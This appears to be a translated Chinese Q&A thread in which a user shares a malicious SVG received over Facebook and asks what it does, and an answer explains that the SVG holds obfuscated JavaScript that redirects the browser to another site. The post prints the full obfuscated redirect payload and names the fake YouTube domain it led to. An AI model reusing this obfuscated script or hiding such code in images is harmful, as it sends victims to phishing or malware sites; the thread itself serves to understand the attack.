我收到了带有两个文件(SVG图片)的facebook消息,我点击其中一个(我不知道为什么:()。然后打开红点的新标签,然后我立即被重定向到某个网站假装看起来像Youtube(http://kerman.pw/?fb_dsa
)。
然后我使用"保存链接下载了.svg文件..."功能。 看来这是一些嵌入svg的javascript代码,所以我在这里发帖(我不太清楚JS):
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function xcxxy(gyqbv,hzrgh,ktjrf){
var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
var bnkdip = "";
var igrqm = 0;
while(vyqsvo[igrqm]){
igrqm++;
}
var kwwtmh = 0;
while(gyqbv[kwwtmh]){
var jikaig = 0;
var axfnq = -1;
while(qixua[jikaig]){
if(qixua[jikaig] == gyqbv[kwwtmh]){
axfnq = jikaig;
break;
}
jikaig++;
}
if(axfnq >= 0){
var abxnk = 0;
var wjtfca = -1;
while(vyqsvo[kwwtmh%igrqm][abxnk]){
if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
wjtfca = abxnk;
break;
}
abxnk++;
}
bnkdip += qixua[wjtfca];
}else{
bnkdip += gyqbv[kwwtmh];
}
kwwtmh++;
}
var evhrt = "";
for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
evhrt += bnkdip[izqfrv];
}
bnkdip = evhrt;
return bnkdip;
}
var obejok = window;
var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
var leizjp = xcxxy("kBB?5S:Uh",1,false);
var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
]]></script>
</svg>
我真的不懂javascript,我想知道它能做些什么。它会伤到我吗? 非常感谢你
答案 0 :(得分:4)
你是正确的SVG文件嵌入了javascript。 SVG是矢量图形文件,它将根据文件内的指令在浏览器中绘制图像。您找到的SVG包含模糊的javascript以隐藏实际发生的内容。
从我能看到的内容一眼就可以看到,这是一个打开新浏览器窗口并加载新URL的脚本,所以它本身并不危险,这一切都取决于它将您重定向到哪个网站,以及当你到达网站时,会设置哪些脚本开始。
简而言之,假设您重定向到的网站是恶意的,它可能会损害您的计算机。
我希望有所帮助。